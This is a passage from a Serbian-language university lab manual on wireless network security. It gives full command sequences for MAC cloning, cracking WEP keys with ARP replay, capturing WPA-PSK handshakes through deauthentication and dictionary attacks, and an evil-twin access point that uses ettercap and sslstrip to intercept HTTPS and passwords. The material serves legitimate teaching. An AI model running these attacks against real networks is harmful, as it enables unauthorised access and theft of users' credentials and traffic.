се не налазе на његовој листи легитимних корисника. MAC адреса 26 je јединствен број којим се врши идентификација уређаја/адаптера у локалној мрежи. MAC адреса се трајно смешта у ROM меморију мрежне картице и не може бити програмски промењена. Ипак, ова адреса се копира у RAM при ресетовању уређаја, па се при њеном коришћењу користи адреса смештена у RAM меморији. 26 Media Access Control Address 96

105 Бежични комуникациони системи Овакав начин рада омогућио је да се направе програми који ће мењати вредност MAC адресе у RAM меморији, и касније ту адресу користити у мрежној комуникацији. Уз помоћ програма који скенирају бежичне мреже можемо добити листу клијената који су повезани на жељену приступну тачку. Све што треба урадити је украсти MAC адресу легитимног клијента и клонирати је. Активност 5: Филтрирање саобраћаја по МАС адресама Подесити филтрирање МАС адреса на бежичној приступној тачки (за детаље погледати упутство у IV вежби). Дозволити приступ само рачунарима који су тренутно повезани на приступну тачку. Скенирањем мрежног саобраћаја утврдити MAC адресе клијената који су повезани на жељену приступну тачку. Како би клонирали MAC адресу неопходно је прво деактивирати бежични мрежни адаптер: ifconfig wlan0 down Затим је потребно подесити жељену МАС адресу на бежични мрежни адаптер: ifconfig wlan0 hw ether <MAC > Поново активирати мрежни адаптер: ifconfig wlan0 up Успоставити везу са приступном тачком: iwconfig wlan0 essid <SSID > Потребно је подесити wlan0 адаптер да ради као DHCP клијент: dhclient wlan0 Отворити интернет претраживач и тестирати доступност Интернета. Да ли је успело остваривање везе уз помоћ клониране МАС адресе? У Windows оперативним системима MAC адреса може сепроменити и без коришћења додатних програма, додавањем вредности NetworkAddress у бази регистара за одговарајући бежични мрежни адаптер (слика 6.3). Слика 6.3 : Промена MAC адресе на жељену вредност:

106 98

107 VII ВЕЖБА ПРАКТИЧНА АНАЛИЗА WEP СИГУРНОСНОГ МЕХАНИЗМА Циљ вежбе је упознавање студената са техникама и врстама упада у бежичне рачунарске мреже. У овој вежби детаљно су описане све карактеристике WEP протокола за заштиту бежичног приступа мрежи као и напади на исти. Студенти ће током вежбе тестирати могућност упада у мрежу заштићену овим протоколом, како би увидели све његове слабости.

108 VII Вежба 7. Практична анализа WEP сигурносног механизма 7.1 Увод На вежбама до сада није коришћен ниједан механизам за шифровање података. Овде ћемо се осврнути безбедносним механизмима који су део иницијалног стандарда , ти механизми заштите су названи WEP 27. Као што се и по самом имену може закључити, WEP је намењен да оствари ниво безбедности сличан оном који се налази у ожиченим мрежама. На вежбама ћемо приказати које су лоше стране овог механизма заштите и зашто он више не би требало да се користи. Протокол IEEE WEP обезбеђује аутентификацију и шифровање података између рачунара и бежичне приступне тачке користећи симетрични кључ. WEP не обезбеђује механизам размене кључева, па се подразумева да је кључ дистрибуиран неким сигурним каналом до рачунара и бежичне приступне тачке. 7.2 WEP аутентификација Приступна тачка мора да аутентификује рачунар пре него што се рачунар повеже са бежичном мрежом. IEEE стандард дефинише два начина WЕР аутентификације: систем отворене аутентификације, аутентификација дељеним кључем. Систем отворене аутентификације дозвољава било којем бежичном уређају да приступи бежичној мрежи. Рачунар може поставити вредност ANY у SSID поље у заглављу оквира и на тај начин се повезати са било којом приступном тачком која се налази у домету. Пошто овде практично и не постоји аутентификација овај систем се најчешће користи код јавних приступних тачака hot-spots. Слика 7.1 : Систем отворене аутентификације На слици 7.1 приказани су следећи кораци система отворене аутентификације: 1. Бежична станица шаље захтев за аутентификацију бежичној приступној тачки. 27 Wired Equivalent Privacy - приватност еквивалентна ожичењу 100

109 Бежични комуникациони системи 2. Бежична тачка аутентификује станицу. 3. Бежична станица се повезује на бежичну мрежу. Систем аутентификације дељеним кључем захтева да бежична станица и приступна тачка имају идентичан WEP кључ за аутентификацију. Аутентификација у овом случају се одвија у четири корака, што је приказано на слици 7.2: 1. Бежична станица захтева аутентификацију од стране приступне тачке. 2. Приступна тачка одговара на захтев за аутентификацијом 128-бајтном једнократном поруком. 3. Бежична станица шифрује једнократну вредност користећи симетрични кључ који дели са приступном тачком. 4. Приступна тачка дешифрује једнократну поруку. 5. Ако дешифрована једнократна порука одговара оној која је првобитно послата станици, онда је приступна тачка аутентификовала бежичну станицу и станица се прикључује на бежичну мрежу. Наравно, уколико дешифрована једнократна порука не одговара првобитно послатој поруци, приступна тачка одбија да аутентификује бежичну станицу. Слика 7.2 : Систем аутентификације дељеним кључем Систем аутентификације са дељеним кључем у пракси се готово и не користи јер доста олакшава посао нападачу који прислушкује саобраћај. Наиме, једнократна порука се шаље без икакве заштите и нападач може ту поруку да искористи како би касније компромитовао дељени кључ јер ће поседовати и шифровану и нешифровану верзију једнократне поруке. Још једна мана оваквог начина аутентификације је та да клијент нема могућност да провери идентитет бежичне приступне тачке. 7.3 Шифровање података WEP протокол користи RC4 алгоритам за генерисање низа псеудослучајних битова у зависности од вредности дељеног кључа и иницијализационог вектора IV. Шифровани податак се 101

110 VII Вежба добија када се изврши XOR операција (ексклузивна ИЛИ логичка операција) над битовима корисничких података и генерисаног низа псеудослучајних бројева: где је: C = [ M ICV(M) ] [ RC4(K IV) ] С шифрат, М кориснички подаци, ICV(M) вредност за проверу интегритета поруке, ексклузивна ИЛИ логичка операција, К секвенца кључа, IV - иницијализациони вектор, - оператор спајања. Слика 7.3 : Алгоритам WEP за шифровање Алгоритам WEP за шифровање илустрован је на слици 7.3. КeyID, тајни 40-битни или 104- битни симетрични кључ, по претпоставци познају и рачунар и бежична приступна тачка. Поред тога, 24-битни иницијализациони вектор (IV) додаје се на 40-битни или 104-битни дељени кључ да би се створио 64-битни, односно 128-битни кључ који ће се користити за шифровање једног оквира. IV ће се мењати од оквира до оквира, па ће зато сваки оквир бити шифрован различитим кључем. Пре шифровања, за поље података се рачуна CRC 28 и затим се ова вредност додаје на крај података који се штите. CRC-32 представља алгоритам за очување интегритета поруке који рачуна контролни збир оквира. CRC-32 није био најсретније решење за проверу интегритета јер не пружа довољно добру криптографску заштиту због своје линеарности. Сам начин функционисања алгоритма RC4 и CRC-32 није предмет овог курса, за детаље о овим алгоритмима погледати: Сигурност WEP-а заснована је на тајности кључа. Правилна употреба алгоритма RC4 захтева да се иста вредност кључа никада не користи више пута, што се решило увођењем иницијализационог вектора који је различит за сваки оквир. Али направљен је велики пропуст 28 Cyclic redundancy check 102

111 Бежични комуникациони системи везан за IV у самој архитектури WEP-а, а то је величина поља у којем је уписан иницијализациони вектор. Наиме, величина овог поља износи 24 бита, што значи да постоји свега 2 24 јединствених кључева. Ако се ти кључеви бирају на случајан начин, може се доказати да је вероватноћа да се изабере иста вредност IV (па се зато употреби иста вредност кључа) већа од 99% већ после оквира. Са оквирима величине 1КВ и брзином преноса података од 54Mb/s, потребно је свега неколико секунди да се пренесе оквира. Такође, као што се може приметити на слици 7. 3, вредност IV се шаље без заштите (није шифрована) у самом заглављу сваког WEP шифрованог оквира. Јер пријемна страна мора да зна вредност IV како би могла да генерише исти кључ и да дешифрује податке. 7.4 Подешавања WEP параметара Подешавање бежичне приступне тачке да користи WEP механизме заштите објашњено је у IV вежби. Да бисте подесили Windows оперативне системе да користе WEP механизме заштите потребно је извршити следеће кораке: 1. У контролном панелу система (Control panel) одабрати опцију подешавања мрежних адаптера. 2. Одабрати жељени бежични мрежни адаптер и излистати његове атрибуте (Properties). Слика 7.4 : Опција за додавање нове мреже 103

112 VII Вежба 3. У атрибутима одабрати подешавања за бежичне мреже (слика 7.4) и одабрати опцију за додавање нове мреже (Add ). 4. Затим је потребно унети жељени SSID, жељени тип аутентификације и WEP кључ (слика 7.5). Слика 7.5 : Атрибути за подешавање бежичне конекције Да бисте подесили Linux оперативне системе из конзолног прозора да користе WEP механизме заштите потребно је извршити следеће кораке: 1. Отворити конзолни прозор. 2. Командом iwconfig прегледати доступне бежичне мрежне адаптере (слика 7.6). 104

113 Бежични комуникациони системи Слика 7.6 : Системски одзив команде iwconfig 3. Да бисмо се повезали са бежичном приступном тачком на којој су пoдешени WEP механизми заштите потребно је навести ESSID ознаку као и вредност WEP кључа. То постижемо командом: iwconfig <адаптер> ESSID <essid> key <дељени кључ> Нпр: iwconfig wlan0 ESSID lab403 key 33:BB:33:FF:11: На крају је потребно подесити да бежични адаптер добија адресу динамички: 7.5 Напади на WEP dhclient wlan0 Нападе на WEP механизам заштите најопштије можемо поделити на две категорије: Пасивни напади. Код ове врсте напада врши се пасивно прислушкивање и анализа прикупљеног мрежног саобраћаја. Активни напади. Код активних напада нападач утиче на комуникацију у бежичној мрежи тако што омета саобраћај, мења податке, итд. У активне нападе спадају понављање IV-а, обртање битова, напад човек у средини, крађа сесије и напад понављањем пакета. Циљ активних напада је да за доста краће време прикупе потребну количину оквира на основу којих ће моћи, одређеним методама, да дешифрују поруке или компромитују дељени кључ. Практични напад на WEP може се извести уз помоћ алата из Aircrack-ng пакета. Конкретно у aireplay-ng програм је имплементирано неколико различитих техника за компромитовање WEP дељеног кључа: напад убацивањем пакета, напад понављањем ARP захтева, KoreK-chopchop напад, напад фрагментацијом, 105

114 VII Вежба напад Cafe-latte. У овој вежби фокусираћемо се на напад понављањем ARP захтева јер се показао као најефикаснији напад када у мрежи постоји клијент који је асоциран са бежичном приступном тачком која користи WEP механизме заштите. За више информација о осталим врстама напада који су имплементирани у aireplay-ng програму посетите официјалну интернет страницу 29. Напад понављањем ARP захтева Главни циљ ове врсте напада је да генерише што већу количину саобраћаја како би били у могућности да сакупимо што већи број различитих IV који се користе у комуникацији између легитимног клијента и бежичне приступне тачке. Неке од оквира који се размењују лако је препознати иако су шифровани. У ту групу оквира спада и ARP захтев, зато што овај оквир увек има исту количину података, и увек је позната одредишна адреса. ARP захтев је увек адресиран на broadcast адресу (FF:FF:FF:FF:FF:FF) и дужине је 68 октета. Један те исти ARP захтев може бити поново убациван у мрежу како би приморао легитимне бежичне клијенте да генеришу нове ARP одговоре, што значи да би добили исте поруке које су шифроване новим кључем јер је промењена вредност IV. Овај напад се састоји из три фазе: airodump-ng програмом врши се детекција бежичних мрежа са имаплементираним WEP механизмом заштите, затим се овај програм користи и за прикупљање мрежног саобраћаја потребног за анализу и компромитовање скривеног кључа; aireplay-ng програмом врши се детекција и поновно убацивање ARP захтева у бежичну мрежу како би се иницијализовала велика количина бежичног саобраћаја; aircrack-ng је програм који на основу прикупљених вредности IV открива тајни WEP кључ. Процедура за извођење напада је следећа: Потребно је поставити бежични адаптер у монитор режим рада: airmon-ng start wlan0 Затим можемо стартовати airodump-ng програм како би детектовали мреже које користе WEP механизам заштите: airodump-ng mon

115 Бежични комуникациони системи Слика 7.7 : Детектоване бежичне приступне тачке које користе WEP Када смо детектовали жељену мрежу, почећемо са прикупљањем мрежног саобраћаја: где је: airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 w snimak mon0 -c 9 број канала на коме ће се ослушкивати саобраћај, --bssid 00:14:6C:7E:40:80 МАС адреса бежичне приступне тачке, w snimak датотека у којој ће се чувати прикупљени мрежни саобраћај. Сада је потребно покренути aireplay-ng програм у новом конзолном прозору. Циљ овог корака је да подесимо aireplay-ng да ослушкује ARP захтеве и да их затим поново убацује у мрежу. Потребно је извршити следећу команду: где је: aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 mon0-3 ознака напада, -b 00:14:6C:7E:40:80 - МАС адреса бежичне приступне тачке, -h 00:0F:B5:88:AC:82 - МАС адреса клијента. Када програм детектује ARP захтев аутоматски га враћа поново у мрежу и пружа следећи одзив система: Saving ARP requests in replay_arp cap You should also start airodump-ng to capture replies. Read packets (got ARP requests), sent packets... У овом тренутку, ако погледамо у конзолни прозор у коме смо оставили airodump-ng програм да прикупља податке, можемо приметити да се број прикупљених пакета убрзано повећава (слика 7.8). 107

116 VII Вежба Слика 7.8 : Статистика прикупљеног саобраћаја програмом airodump-ng Када прикупимо довољну количину података (око 20,000 пакета за 64-битни кључ и око 40,000 пакета за 128-битни кључ) потребно је покренути airecrack-ng програм чији је задатак да утврди вредност скривеног WEP кључа на основу сакупљених података: где је: aircrack-ng -b 00:14:6C:7E:40:80 snimak*.cap -b 00:14:6C:7E:40:80 - МАС адреса бежичне приступне тачке, snimak*.cap име датотеке у којој смо снимили прикупљени саобраћај. Ако је поступак успешно изведен систем ће пружити сличан одзив као на слици (7.9): Слика 7.9 : Успешно откривен кључ програмом aircrack-ng Активност 1: Откривање 64-битног WEP кључа Подесити бежичну приступну тачку да користи WEP механизам заштите. Изабрати 64-битни кључ и унети фразу: password на основу које ће бити генерисан WEP кључ. Повезати бежичног клијента на претходно подешену приступну тачку. На основу претходно описане процедуре пронаћи WEP кључ. Повезати се на мрежу користећи откривени кључ. 108

117 Бежични комуникациони системи Активност 2: Откривање 128-битног WEP кључа Подесити бежичну приступну тачку да користи WEP механизам заштите. Изабрати 128-битни кључ и унети фразу: password на основу које ће бити генерисан WEP кључ. Повезати бежичног клијента на претходно подешену приступну тачку. На основу претходно описане процедуре пронаћи WEP кључ. Повезати се на мрежу користећи откривени кључ. 109

118 110

119 VIII ВЕЖБА ПРАКТИЧНА АНАЛИЗА WPA/WPA2 СИГУРНОСНОГ МЕХАНИЗМА Циљ вежбе је упознавање студената са техникама и врстама упада у бежичне рачунарске мреже. У овој вежби детаљано су описане карактеристике IEEE i стандарда за заштиту бежичног приступа мрежи као и напади на исти. Студенти ће током вежбе тестирати могућност упада у мрежу заштићену овим стандардом, како би увидели све слабости стандарда и стекли сазнања како да унапреде заштиту.

120 VIII Вежба 8. Практична анализа WPA/WPA2 сигурносног механизма 8.1 Увод У претходној вежби имали смо прилике да уочимо мане које је имао WEP механизам заштите. Због уочених недостатака IEEE организација је у јануару године оформила радну групу чији је задатак био да успостави нове стандарде за заштиту бежичних рачунарских мрежа. Тада је почео да се развија стандард IEEE i (WPA2 30 ). Како је процес стандардизације јако спор, Wi-Fi удружење, које је састављено од великог броја водећих произвођача бежичне мрежне опреме, одлучило је да развије пре-стандард који би био компатибилан са опремом која је користила WEP механизме заштите. Такође, много мање времена је било потребно да се овај стандард пусти у употребу него стандард који је развијала IEEE организација. Време је имало посебан значај јер је свима било у интересу да се што пре замени WEP механизам заштите који је пробијен у потпуности. Априла године Wi-Fi удружење је представило WPA стандард, док је тек у јулу године IEEE организација ратификовала i побољшање, односно WPA2. Основна разлика између WPA и WPA2 је у типу алгоритма за шифровање. WPA користи RC4 алгоритам, док WPA2 користи AES алгоритам за шифровање. WPA користи RC4 алгоритам како би био компатибилан са старијим уређајима који су користили WEP. RC4 је јако елегантан алгоритам са распрострањеном употребом, и овај алгоритам је пажљиво имплементиран у WPA за разлику од помало несретне имплементације у WEP механизму заштите. 8.2 WPA/WPA2 архитектура WPA и WPA2 су доста компликованији од WEP протокола. WPA и WPA2 могу радити у два режима рада: режим рада за SOHO мреже код овог режима рада користи се дељени тајни кључ (PSK 31 ) који поседује бежична приступна тачка и њени клијенти, режим рада за корпорацијске мреже код овог режима рада користи се RADIUS 32 сервер који врши аутентификацију корицника. По последњим анализама, PSK начин рада се највише користи. У овој вежби биће обрађен овај режим рада као и напади који се могу пласирати против WPA-PSK и WPA2-PSK механизама заштите. WPA-PSK и WPA2-PSK За разлику од WEP протокола, WPA/WPA2 користе читаву хијерархију кључева. Сви кључеви се изводе из главног кључа PMK 33 који је дужине 256 битова. Код WPA-PSK и WPA2-PSK, PMK се добија познатом криптографском методом из фразе (PSK) коју корисник треба да унесе (фраза мора бити дужине између 8 и 63 ACSII карактера). 30 Wi-Fi Protected Access 31 Pre-shared key 32 Remote Authentication Dial In User Service 33 Pairwise master key 112

121 Бежични комуникациони системи На слици 8.1 приказани су извођење и инсталација кључева код WPA/WPA2. PMK се прорачунава на основу дељеног тајног кључа (PSK). PMK се добија тако што се 4096 пута рачуна hash функција за PSK у комбинацији са SSID ознаком. Слика 8.1 : Извођење и инсталација кључева код WPA/WPA2 протокола Једном када клијент прорачуна PMK, он заједно са бежичном приступном тачком креира привремени кључ (PTK 34 ). Овај кључ се креира сваки пут када клијент приступа бежичној мрежи, а може се подесити да се мења и периодично. PTK се рачуна функцијом која комбинује: PMK, насумични број који је генерисала приступна тачка (A-nonce), 34 Pairwise transient key 113

122 VIII Вежба насумични број који је генерисао сам клијент (S-nonce), MAC адресу приступне тачке, MAC адресу клијента. За генерисање PTK кључа користи се велики број варијабли како би се обезбедило да се кључеви нe понављају периодично. Бежична приступна тачка проверава MIC 35 поље за време аутентификације како би утврдила да ли захтев потиче од регуларног клијента. MIC представља шифровану hash вредност оквира и користи се за проверу интегритета поруке као и за проверу исправности кључа клијента. Ако клијент нема исправан PMK он не може да изведе правилан PTK кључ, а ако не може да израчуна PTK кључ онда не може да израчуна исправну hash вредност оквира. На исти начин се и клијент уверава да бежична приступна тачка има исправан PMK. 8.3 Напади на WPA-PSK и WPA2-PSK Напади који се користе како би се открили WPA-PSK или WPA2-PSK своде се на напад речником. Овакви напади ослањају се на чињеницу да већина људи бира кратке и једноставне лозинке које је лако запамтити. Овом техником напада се за све речи из речник-датотеке рачуна hash вредност у нади да ће се наћи исправан PMK. Пошто је ова врста напада доста очигледна, творци WPA и WPA2 стандарда су се потрудили да максимално отежају нападачима да дођу до дељених кључева. На слици 8.1 приказано је да се PMK кључ добија на основу дељеног кључа (PSK) након 4096 hash прорачуна. Рачунање 4096 hash функција није толико проблем за легитимне кориснике јер они такву врсту рачунања треба да одраде само једанпут. Нападачи морају да изведу овај број рачунања за сваку вредност из речника, што овакву врсту напада знатно успорава. Такође може се уочити на слици 8.1 да PMK није изведен само на основу PSK, већ зависи и од SSID вредности. Ова карактеристика чини откривање PMK кључа још тежим јер се не могу користити већ прорачунати речници зато што се може десити да две бежичне мреже користе исти PSK, али имају различите SSID тако да се њихови PMK кључеви разликују. Важно је назначити да је техника компромитовања кључева идентична за мреже које користе WPA и мреже које користе WPA2 механизам заштите. WPA и WPA2 користе исту функцију за генерисање PMK кључа. Једина разлика је што користе различите функције за креирање MIC вредности за време четвороструке размене порука за време аутентификације. Напад који ће бити приказан у наставку вежбе може бити изведен само ако постоји клијент који је већ аутентификован бежичном приступном тачком. Циљ напада је да се региструје и сними четворострука размена порука за време аутентификације регуларног клијента. Ова размена порука нам је потребна како би уз помоћ алата aircrack-ng покушали да откријемо PSK. Програму aircrack-ng су потребне A-nonce и S-nonce вредности како би могао да израчунава MIC. Када израчуна MIC вредност која се подудара са MIC вредношћу која је размењена у току аутентификације клијента, то значи да је употребио исправан PSK и лозинка је откривена. 35 Message Integrity Protocol 114

123 Бежични комуникациони системи Напад се пласира у три фазе: airodump-ng програмом врши се детекција бежичних мрежа са имплементираним WPA-PSK/WPA2-PSK механизмом заштите, затим се овај програм користи и за прикупљање четвороструке размене порука за време аутентификације; aireplay-ng програмом врши се деаутентификација регуларног клијента како би иницијализовали поновну размену порука за аутентификацију. Уместо овог корака може се изабрати пасивно ослушкивање, у том случају требало би сачекати да се нови клијент аутентификује и приступи бежичној мрежи. aircrack-ng је програм који ће извршити напад речником и који ће израчунавати потребне hash вредности кључева. Пласирање напада Процедура за извођење напада је следећа: Потребно је поставити бежични адаптер у монитор режим рада: airmon-ng start wlan0 Затим можемо стартовати airodump-ng програм како би детектовали мреже које користе WPA-PSK/WP2-PSK механизам заштите: airodump-ng mon0 Слика 8.2 : Детектоване бежичне приступне тачке које користе WPA-PSK/WP2-PSK Када смо детектовали жељену мрежу почећемо са прикупљањем мрежног саобраћаја: airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 w psk_snimak mon0 где је: -c 9 број канала на коме ће се ослушкивати саобраћај, 115

124 VIII Вежба --bssid 00:14:6C:7E:40:80 МАС адреса бежичне приступне тачке, w psk_snimak датотека у којој ће се чувати прикупљени мрежни саобраћај. Сада је потребно покренути aireplay-ng програм у новом конзолном прозору. Циљ овог корака је да извршимо деаутентификацију клијента: где је: aireplay-ng a 00:14:6C:7E:40:80 -c 00:0F:B5:88:AC:82 mon0-0 ознака напада, -a 00:14:6C:7E:40:80 - МАС адреса бежичне приступне тачке, -c 00:0F:B5:88:AC:82 - МАС адреса клијента. Када airodump-ng програм детектује четвороструку размену порука за аутентификацију (слика 8.3), потребно је покренути airecrack-ng програм: aircrack-ng -w /pentest/passwords/jtr/password.lst -b 00:14:6C:7E:40:80 psk_snimak*.cap где је: -b 00:14:6C:7E:40:80 - МАС адреса бежичне приступне тачке, psk_snimak*.cap име датотеке у којој смо снимили прикупљени саобраћај. -w /pentest/passwords/jtr/password.lst путања до речник-датотеке. Слика 8.3 : Успешно ухваћена четворострука размена порука за аутентификацију Ако је поступак успешно изведен систем ће пружити одзив као на слици

125 Бежични комуникациони системи Слика 8.4 : Успешно откривен кључ програмом aircrack-ng Активност 1: Откривање WPA кључа Подесити бежичну приступну тачку да користи WPA-PSK механизам заштите. Унети фразу : password на основу које ће бити генерисан PMK кључ. Повезати бежичног клијента на претходно подешену приступну тачку. На основу претходно описане процедуре пронаћи WPA-PSK кључ. Повезати се на мрежу користећи откривени кључ. 8.4 Повезивање клијента на мрежу са WPA-PSK/WPA2-PSK механизмом заштите Подешавање бежичне приступне тачке да користи WPA/WPA2 механизме заштите је објашњено у IV вежби. Да бисте подесили Windows оперативне системе да користе WPA/WPA2 механизме заштите потребно је извршити следеће кораке: 1. У контролном панелу система (Control panel) одабрати опцију подешавања мрежних адаптера. 2. Одабрати жељени бежични мрежни адаптер и излистати његове атрибуте (Properties). 117

126 VIII Вежба Слика 8.5 : Опција за додавање нове мреже 5. У атрибутима одабрати подешавања за бежичне мреже (слика 8.5) и одабрати опцију за додавање нове мреже (Add ). 6. Затим је потребно унети жељени SSID, жељени тип аутентификације и PSK кључ (слика 8.6) 118

127 Бежични комуникациони системи Слика 8.6 : Атрибути за подешавање бежиче конекције Да бисте подесили Linux оперативне системе из конзолног прозора да користе WPA/WPA2 механизме заштите потребно је извршити следеће кораке: 1. Потребно је уз помоћ едитора текста (нпр. nano) направити wpa_supplicant.conf датотеку, и унети следеће опције: ctrl_interface=/var/run/wpa_supplicant ctrl_interface_group=0 eapol_version=1 ap_scan=1 fast_reauth=1 network={ ssid="вредност ESSID" >> са наводницима proto=wpa key_mgmt=wpa-psk pairwise=tkip psk="кључ" >> са наводницима } 2. Затим је потребно покренути команду за WPA супликанта: wpa_supplicant -i wlan0 -c wpa_supplicant.conf 119

128

129 IX ВЕЖБА СОФТВЕРСКА БЕЖИЧНА ПРИСТУПНА ТАЧКА Циљ ове вежбе је креирање софтверске бежичне приступне тачке, тј. начина на који можемо конфигурисати Linux оперативни систем да има функцију приступне тачке. Након креирања бежичне приступне тачке, вежба се усмерава на безбедносне ризике који могу настати нападима уз помоћ лажне бежичне приступне тачке.

130 IX Вежба 9. Софтверска бежична приступна тачка 9.1 Увод До сада су се у вежбама користили уређаји који су имали улогу бежичне приступне тачке. Linux оперативни систем можемо конфигурисати да има улогу бежичне приступне тачке. Слика 9.1 : Софтверска бежична приступна тачка Идеја је да се бежични адаптер на рачунару постави у режим рада бежичне приступне тачке и да се подаци прослеђују кроз етернет мрежни адаптер даље у мрежу и на крају на Интернет (слика 9.1). На исти начин функционишу и хардверски уређаји које смо до сада користили. 9.2 Конфигурација оперативног система Конфигурацију можемо поделити на неколико целина: 1. конфигурација DHCP сервера, 2. конфигурација бежичног адаптера да ради у режиму приступне тачке, 3. омогућавање прослеђивања података са бежичног адаптера на етернет адаптер. DHCP сервер подешава се у текстуалном конфигурационом фајлу /etc/dhcp3/dhcpd.conf. Добра пракса је да се сачува оригинални dhcpd.conf у коме се налазе упутства за конфигурацију. Затим треба уписати одговарајуће параметре у конфигурациони фајл. mv /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.bkp nano /etc/dhcp3/dhcpd.conf ddns-update-style ad-hoc; default-lease-time 600; max-lease-time 7200; subnet netmask { option subnet-mask ; option broadcast-address ; option routers ; option domain-name-servers ; range ; } mkdir p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd 122

131 Бежични комуникациони системи Airbase-ng програм користимо како бисмо поставили бежични адаптер у режим рада бежичне приступне тачке. Пре тога је потребно креирати адаптер који ради у монитор режиму. Након што аirbase-ng креира виртуелни адаптер (најчешће са именом at0), потребно је подесити адресу на том адаптеру и унети клијентску мрежу у табелу рутирања. airmon-ng start wlan0 airbase-ng -e BksAP -c 9 mon0 ifconfig at0 up ifconfig at netmask route add -net netmask gw Затим је потребно покренути DHCP сервер са командом која му указује на локацију конфигурационог фајла и PID фајла где ће уписати ознаку свог процеса. dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcpd/dhcpd.pid at0 И као трећи корак треба омогућити рутирање између виртуелног мрежног адаптера бежичне приступне тачке (at0) и етернет адаптера (или нпр. другог бежичног адаптера који има везу ка Интернету). За подешавање рутирања користе се iptables на Linux оперативним системима. iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE iptables --append FORWARD --in-interface at0 -j ACCEPT iptables --table nat --append PREROUTING p udp -dport 53 j DNAT -to default_gateway_od_eth0 echo 1 > /proc/sys/net/ipv4/ip_forward 9.3 Напади коришћењем лажне бежичне приступне тачке Коришћење лажне бежичне приступне тачке представља један од најопаснијих напада на бежичне рачунарске мреже. Све до сада описане и симулиране технике напада могу бити осујећене одабиром добрих механизама за заштиту и јаких лозинки. Додуше увођењем CUDA технологије и коришћење јаких лозинки може бити недовољно, али свакако је потребно одређено време како би се лозинке компромитовале. Напад са лажном бежичном приступном тачком представља једну врсту социјалног инжењеринга, а поред тога омогућава и нападе човек у средини 36. Главна замисао нападача је 36 Man-in-the-middle 123

132 IX Вежба да обмане кориснике да се асоцирају на лажну бежичну приступну тачку која је под контролом самог нападача. Принцип напада је илустрован на слици 9.2. Слика 9.2 : Напад са лажном бежичном приступном тачком На слици је приказан напад тзв. зли близанац (Evil twin), где нападач поставља бежичну приступну тачку са истим SSID-ом као што има и легитимна бежична мрежа. Нападач мора обезбедити сигнал веће снаге како би се клијенти асоцирали на њега, у ту сврху се може користити и напад ометањем сервиса легитимне бежичне приступне тачке. Нападач свој бежични мрежни адаптер мора подесити да се понаша као бежична приступна тачка, што се постиже употребом посебних драјвера и програма. Када клијенти покушају да се асоцирају на лажну мрежу, може се од њих тражити да унесу лозинку за приступ мрежи и на тај начин може доћи до компромитовања лозинки. Када се клијенти асоцирају на лажну бежичну мрежу може се започети напад човек у средини и на тај начин нападач може доћи до поверљивих података. Могу се лако видети адресе интернет презентација које корисник посећује, могу се видети све слике које корисник види у свом интернет претраживачу и оно што је најопасније могу се видети подаци који се преносе у оквиру заштићеног SSL тунела измећу сервера и клијента. Када клијент жели да приступи неком сајту који је заштићен (https протокол) постоје програми као што је Ettercap који ће пресрести SSL захтев корисника и понудити му лажан сертификат. Ако корисник прихвати лажан сертификат, а спроведена анкета показује да 76% испитаника не обраћа пажњу на упозорења о непровереним сертификатима, Ettercap успоставља SSL тунел између себе и рачунара који је нападнут и такође успоставља тунел између себе и оригиналног сервера на Интернету. У оваквом сценарију нападач може да дешифрује саобраћај пре него што га опет шифрује и проследи га кроз SSL тунел ка оригиналном серверу. Да би се извршио описани напад потребно је користити још пар алата: Ettercap сакупља пакете и пласира напад човек у средини ; Sslstrip снимање HTTPS сесија; Driftnet узима слике из TCP сесија; 124

133 Бежични комуникациони системи #Редирекција http и https портова због Ettercap програма iptables -t nat -A PREROUTING -p tcp --destination-port 80 - j REDIRECT --to-ports iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports ettercap -T -q -p -i at0 // // sslstrip -a -k f driftnet -v -i at0 Резултат овог напада може се видети на слици 9.3 где се виде слике које је корисник имао у свом интернет претраживачу као и компромитоване лозинке са сајта. Слика 9.3 : Резултат напада Активност 1: Конфигурација софтверске приступне тачке Према упутству конфигурисати софтверску приступну тачку. Вежба се изводи у паровима, где ће један од учесника имати улогу бежичног клијента док ће други имати улогу софтверске приступне тачке. Активност 2: Тестирати напад коришћењем лажне бежичне приступне тачке Вежба се изводи у паровима, где ће један од учесника имати улогу бежичног клијента док ће други имати улогу нападача. 125

134 126

135 X ВЕЖБА БЕЖИЧНЕ ЛОКАЛНЕ РАЧУНАРСКЕ МРЕЖЕ У КОРПОРАТИВНОМ ОКРУЖЕЊУ Циљ вежбе је упознавање студената са сигурносним протоколима локалних бежичних мрежа у корпоративом окружењу. У вежби је поред теоријске основе дат и практичан пример конфигурације бежичне рачунарске мреже која користи RADIUS сервер за аутентификацију корисника. 127

136 X Вежба 10. Бежичне локалне рачунарске мреже у корпоративном окружењу 10.1 Увод У претходним вежбама је приказано да се у SOHO мрежама најчешће користи заједнички дељени кључ (PSK) за аутентификацију корисника као и за шифровање података. У зависности од тога који се протокол користи постоје WPA-PSK и WPA2-PSK механизми заштите. У мрежама са великим бројем корисника, као што су корпоративне мреже, користе се тзв. WPA-Enterprise и WPA2-Enterprise механизми заштите. Код ових механизама заштите сваки корисник бежичне мреже има сопствени кључ који користи за аутентификацију и шифровање података. На тај начин повећава се сигурност зато што клијенти не могу међусобно да дешифрују поруке јер се не користи заједнички кључ. У случају да дође до компромитовања кључа једног корисника, не постоји потреба да сви корисници мењају своје кључеве. У овако великим системима постоји централна база корисничких налога (Активни директоријум, LDAP, SQL и сл.) која се користи за складиштење корисничких параметара за приступ систему (корисничко име и лозинка). За аутентификацију корисника код WPA-Enterprise и WPA2--Enterprise механизама заштите користи се IEEE 802.1Х протокол чија је основа EAP 37. IEEE 802.1X представља једноставан концепт чији је циљ да омогући контролу приступа у тачки где корисници приступају мрежи. Тачка у којој корисник приступа мрежи назива се порт. Портови једног система омогућавају систему приступ сервисима које пружају други системи, као и могућност да сопствене сервисе учине доступним другим системима. Систем може имати следеће улоге током интеракције контроле приступа: Супликант, који захтева приступ сервисима. Аутентификатор (NAS 38 ), чији је задатак да изврши обавезну аутентификацију пре него што дозволи приступ сервисима система (може бити 